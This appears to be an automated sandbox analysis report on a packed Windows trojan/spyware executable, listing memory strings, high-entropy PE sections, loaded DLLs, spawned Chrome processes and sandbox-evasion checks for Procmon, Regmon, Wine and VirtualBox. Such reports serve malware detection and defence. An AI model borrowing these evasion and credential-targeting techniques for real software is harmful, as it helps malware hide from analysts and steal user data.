              Source: file.exe, 00000000.00000003.2373944568.0000000005927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2372456002.0000000005A6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2362769773.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390400491.0000000005536000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2374398618.0000000005928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2360929741.0000000005A10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2356900795.00000000059E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363339793.0000000005A22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2373283872.0000000005927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2352004730.00000000059D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2373131154.0000000005A6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2470206700.000000000549F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350748381.0000000005A70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351056575.00000000059C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2374553022.0000000005A72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2371684285.0000000005A55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2363724100.0000000005924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350022470.0000000005928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2360676884.0000000005AD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2356491634.0000000005927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2362563086.0000000005A2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2374890411.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2351188461.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2470665012.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOz vs file.exe
              Source: file.exe, 00000000.00000003.2358402979.0000000005930000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2362041975.0000000005A13000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2371275726.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2353051897.0000000005927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361285504.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361915424.0000000005925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2496074431.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2359379595.0000000005A01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361187192.0000000005925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2355411489.0000000005A8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2361584324.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2365594244.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350177329.0000000005582000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2365373024.0000000005B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2495692494.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2373772211.0000000005A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2357954695.0000000005AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2349513512.000000000592B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2373471320.0000000005A65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2470759109.0000000000D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOz vs file.exe
              Source: file.exe, 00000000.00000003.2360528130.00000000059FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2350643459.00000000059C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2357220000.00000000059E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992891905737705
              Source: file.exeStatic PE information: Section: okzfovcg ZLIB complexity 0.993935938449271
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@7/6
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2087292676.00000000054A4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2087519982.0000000005485000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126548867.00000000054A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 34%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=2012,i,2391827392709409351,7372759067112353565,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,16209135328301955217,6092186935791453691,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=2012,i,2391827392709409351,7372759067112353565,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,16209135328301955217,6092186935791453691,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1857536 > 1048576
              Source: file.exeStatic PE information: Raw size of okzfovcg is bigger than: 0x100000 < 0x19b800
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2389402811.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496046413.0000000005E92000.00000040.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.1a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;okzfovcg:EW;ujgghjao:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;okzfovcg:EW;ujgghjao:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1d1a28 should be: 0x1c61e1
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: okzfovcg
              Source: file.exeStatic PE information: section name: ujgghjao
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D6FAE3 push eax; iretd 0_3_00D6FAF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D69942 push 3F006E6Fh; ret 0_3_00D69981
              Source: file.exeStatic PE information: section name: entropy: 7.9805713763738915
              Source: file.exeStatic PE information: section name: okzfovcg entropy: 7.95393650915222

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
